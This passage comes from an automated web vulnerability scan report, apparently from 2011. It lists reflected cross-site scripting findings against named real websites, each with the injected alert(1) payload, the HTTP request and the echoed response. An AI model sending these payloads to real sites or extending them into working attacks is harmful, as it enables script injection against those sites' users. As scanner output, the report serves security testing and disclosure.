Set-Cookie: PHPSESSID=2a8d68cc828e341da9ecf51dc0fcde45; path=/; domain=.state-insurance-online.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

<title>Get
...[SNIP]...
<link rel="canonical" href="http://www.state-insurance-online.com/favicon.ico4e4ea"><script>alert(1)</script>8c6310db10a" />
...[SNIP]...

6.97. http://www.straight.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.straight.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4497b"><script>alert(1)</script>962dbdb4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4497b"><script>alert(1)</script>962dbdb4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Cache-Control: public, max-age=600
Last-Modified: Tue, 03 May 2011 10:17:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1304417872"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<meta property="og:url" content="http://www.straight.com/favicon.ico4497b"><script>alert(1)</script>962dbdb4d" />
...[SNIP]...

6.98. http://www.thedailycat.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thedailycat.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61c4e'-alert(1)-'a729dccf86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /61c4e'-alert(1)-'a729dccf86e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailycat.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 24326
Date: Tue, 03 May 2011 11:17:31 GMT
X-Varnish: 862715183
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="http://www.thedailycat.com/61c4e'-alert(1)-'a729dccf86e/programsend/programsend.html" target="_blank">
...[SNIP]...

6.99. http://www.thomann.de/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.thomann.de
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff79c"><a>32dbe0704d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoff79c"><a>32dbe0704d3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thomann.de
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:36:06 GMT
Server: Apache/2.2.17
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>

<meta name="copyright" CONTENT="(c) 1996-2008 Musikhaus Thomann. Alle Rechte vorbehalten.">
<meta name="description" conte
...[SNIP]...
<input type="hidden" name="url" value="/favicon.icoff79c"><a>32dbe0704d3">
...[SNIP]...

6.100. http://www.tradearca.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tradearca.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload afcaf<script>alert(1)</script>578bc22bc55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoafcaf<script>alert(1)</script>578bc22bc55 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:33:30 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40784
Content-Type: text/html
Expires: Mon, 02 May 2011 11:32:30 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=GEIHKEODIGCLFNFCNJINCHHK; path=/
Cache-control: False

<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...
<font color="red">http://www.tradearca.com/favicon.icoafcaf<script>alert(1)</script>578bc22bc55</font>
...[SNIP]...

6.101. http://www.tradearca.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tradearca.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ace45<script>alert(1)</script>83d451f698a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?ace45<script>alert(1)</script>83d451f698a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:32:52 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40787
Content-Type: text/html
Expires: Mon, 02 May 2011 11:31:52 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=MBIHKEODKLODDOOAKIGOMOBG; path=/
Cache-control: False

<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...
<font color="red">http://www.tradearca.com/favicon.ico?ace45<script>alert(1)</script>83d451f698a=1</font>
...[SNIP]...

6.102. http://www.travelagentcentral.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.travelagentcentral.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c96af"><script>alert(1)</script>e9980385dab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc96af"><script>alert(1)</script>e9980385dab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelagentcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSb5663581135df8f6d7f3994b7ed7a15c=u8or7c4bpue562t1bohhqhksi0; expires=Thu, 26-May-2011 13:52:59 GMT; path=/; domain=.travelagentcentral.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:19:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>

...[SNIP]...
<a rel="nofollow" onclick="                        window.open('http://www.travelagentcentral.com/favicon.icoc96af"><script>alert(1)</script>e9980385dab?print=1' ,'' ,'');" href="javascript:void(0)" class="print" rel="nofollow">
...[SNIP]...

6.103. http://www.travelagentcentral.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.travelagentcentral.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ef0"><script>alert(1)</script>004bb9d1fb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?a0ef0"><script>alert(1)</script>004bb9d1fb8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelagentcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:19:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSb5663581135df8f6d7f3994b7ed7a15c=0cplvbem6chaa1b42njbn3js30; expires=Thu, 26-May-2011 13:52:42 GMT; path=/; domain=.travelagentcentral.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:19:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>

...[SNIP]...
<a rel="nofollow" onclick="                        window.open('http://www.travelagentcentral.com/favicon.ico?a0ef0"><script>alert(1)</script>004bb9d1fb8=1&print=1' ,'' ,'');" href="javascript:void(0)" class="print" rel="nofollow">
...[SNIP]...

6.104. http://www.upmystreet.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.upmystreet.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 154da'%3balert(1)//fc891691e7e was submitted in the REST URL parameter 1. This input was echoed as 154da';alert(1)//fc891691e7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico154da'%3balert(1)//fc891691e7e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.upmystreet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 03 May 2011 11:22:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.10
Set-Cookie: umsLocId=uk; expires=Thu, 02-Jun-2011 11:22:45 GMT; path=/; domain=upmystreet.com
Set-Cookie: umsLocId=uk; expires=Thu, 02-Jun-2011 11:22:45 GMT; path=/; domain=upmystreet.com
Set-Cookie: PHPSESSID=q70dpe7839j7k219mprla3aid2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uswitch=1795230218.16415.0000; path=/
Vary: Accept-Encoding
Content-Length: 45783

b2ca
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<!--[CDATA[
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName = 'www.upmystreet.com/favicon.ico154da';alert(1)//fc891691e7e';
s.server="";
s.channel = '';
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5 = '';
s.prop6 = '';
s.prop21 = 'PR4 3HP';
s
...[SNIP]...

6.105. http://www.vermontjoblink.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vermontjoblink.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e14f"><a>32f0ca47cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?1e14f"><a>32f0ca47cab=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vermontjoblink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:59:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4238884;expires=Thu, 25-Apr-2041 10:59:18 GMT;path=/
Set-Cookie: CFTOKEN=a337ccc50de11539-B58317FC-9B89-7B08-004A1FC31CD1B138;expires=Thu, 25-Apr-2041 10:59:18 GMT;path=/
Set-Cookie: CFID=4238884;path=/
Set-Cookie: CFTOKEN=a337ccc50de11539%2DB58317FC%2D9B89%2D7B08%2D004A1FC31CD1B138;path=/
Content-Type: text/html; charset=UTF-8


               <html lang="en">
               <head>
               <meta http-equiv="refresh" content="0;URL=https://www.vermontjoblink.com/ada/404/404_qry.cfm?404;http://www.vermontjoblink.com:80/favicon.ico?1e14f"><a>32f0ca47cab=1" />
...[SNIP]...

6.106. http://www.vivareal.us/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vivareal.us
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fa51<script>alert(1)</script>b3226e6c249 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico8fa51<script>alert(1)</script>b3226e6c249 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vivareal.us
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Expires: Tue, 03 May 2011 10:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:47:30 GMT
Content-Length: 11182
Connection: close
Set-Cookie: JSESSIONID=E330D07AEE51FEE4827CA811EE3958D7; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<span>/favicon.ico8fa51<script>alert(1)</script>b3226e6c249/</span>
...[SNIP]...

6.107. http://www.wdasfm.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wdasfm.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb2ad"><script>alert(1)</script>867d071c772 was submitted in the REST URL parameter 1. This input was echoed as fb2ad\"><script>alert(1)</script>867d071c772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icofb2ad"><script>alert(1)</script>867d071c772 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wdasfm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 4191481514
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 10:31:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:31:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40897

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - 105.3 WDAS-FM Philly's Best R&B and Classic Soul!
...[SNIP]...
<meta property="og:url" content="http://www.wdasfm.com/favicon.icofb2ad\"><script>alert(1)</script>867d071c772" />
...[SNIP]...

6.108. http://www.wdasfm.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wdasfm.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f7e"><script>alert(1)</script>b888178402f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8f7e\"><script>alert(1)</script>b888178402f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?b8f7e"><script>alert(1)</script>b888178402f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wdasfm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 4191442722
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 10:29:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:29:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - 105.3 WDAS-FM Philly's Best R&B and Classic Soul!
...[SNIP]...
<meta property="og:url" content="http://www.wdasfm.com/favicon.ico?b8f7e\"><script>alert(1)</script>b888178402f=1" />
...[SNIP]...

6.109. http://www.web-stat.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.web-stat.net
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1067f'-alert(1)-'b7f7d77d581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico1067f'-alert(1)-'b7f7d77d581 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.web-stat.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:37:43 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: referrer_id=; expires=Wed 02-May-2012 11:37:43 GMT; path=/
Set-Cookie: referred_by_affiliate=; domain=.web-stat.net; expires=Tue 03-May-2011 11:38:43 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI", policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Length: 11210

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<t
...[SNIP]...
<script type="text/javascript">

// BEGIN PARAMETERS
var page_name = 'favicon.ico1067f'-alert(1)-'b7f7d77d581';
var invisible = 'yes';
var text_counter = '#';
// END PARAMETERS

wtslog('al2474','1','http',page_name,invisible,text_counter);
</script>
...[SNIP]...

6.110. http://www.webdesign.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webdesign.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc655'%3balert(1)//8b15d10d7c was submitted in the REST URL parameter 1. This input was echoed as bc655';alert(1)//8b15d10d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.icobc655'%3balert(1)//8b15d10d7c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webdesign.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:31:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Set-Cookie: kohanasession=f3e5ad0dac14543eec27dfe2ee6d1572; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=f3e5ad0dac14543eec27dfe2ee6d1572; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Vary: Accept-Encoding
Content-Length: 2288
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Website Templates for web design (Dreamweaver, Frontpage, Flash)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css" rel="
...[SNIP]...
<script type="text/javascript">
try {
_gaq.push(['_setAccount', 'UA-2347512-1']);
_gaq.push(['_trackPageview']);
_gaq.push(['_trackEvent', 'SiteError', '404', '/favicon.icobc655';alert(1)//8b15d10d7c']);
} catch(err) {}
</script>
...[SNIP]...

6.111. http://www.webdesign.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webdesign.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4be24<script>alert(1)</script>e4bac863956 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4be24<script>alert(1)</script>e4bac863956 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webdesign.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:31:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Set-Cookie: kohanasession=520abccfb55413c7b0597f912043928e; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=520abccfb55413c7b0597f912043928e; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Vary: Accept-Encoding
Content-Length: 2316
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Website Templates for web design (Dreamweaver, Frontpage, Flash)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css" rel="
...[SNIP]...
<strong>/favicon.ico4be24<script>alert(1)</script>e4bac863956</strong>
...[SNIP]...

6.112. http://www.wireless-driver.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wireless-driver.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b5de'><script>alert(1)</script>fc86971b1f4 was submitted in the REST URL parameter 1. This input was echoed as 4b5de\'><script>alert(1)</script>fc86971b1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4b5de'><script>alert(1)</script>fc86971b1f4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wireless-driver.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 03 May 2011 10:32:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Vary: Cookie
X-Pingback: http://www.wireless-driver.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:32:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 28264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<area shape='rect' coords='0,0,16,11' href='http://www.wireless-driver.com/favicon.ico4b5de\'><script>alert(1)</script>fc86971b1f4' id='flag_en' title='English'/>
...[SNIP]...

6.113. http://www.xcomment.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db980<script>alert(1)</script>03baad4d242 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodb980<script>alert(1)</script>03baad4d242 HTTP/1.1
